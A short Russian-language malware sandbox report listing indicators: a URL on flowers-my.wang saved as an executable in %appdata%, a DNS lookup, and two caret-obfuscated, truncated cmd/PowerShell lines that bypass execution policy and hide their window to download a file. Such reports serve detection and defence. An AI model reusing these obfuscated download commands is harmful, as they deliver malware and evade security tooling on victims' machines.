Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwER^SHeLL^.e^xe^ -^Ex^e^C^U^t^ION^p^o^l^i^cy^ byPaSs -^n^oP^RoF^IL^e ^-WI^n^D^OW^stY^Le ^HiDDEN ^(nEw^-o^BJEc^t Sys^T^e^M.neT.We^bCLie^Nt).DOwNLOadFIL^E('http://flowers-...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /C "pOwER^SHeLL^.e^xe^ -^Ex^e^C^U^t^ION^p^o^l^i^cy^ byPaSs -^n^oP^RoF^IL^e ^-WI^n^D^OW^stY^Le ^HiDDEN ^(nEw^-o^BJEc^t Sys^T^e^M.neT.We^bCLie^Nt).DOwNLOadFIL^E('http://flowers-...' (со скрытым окном)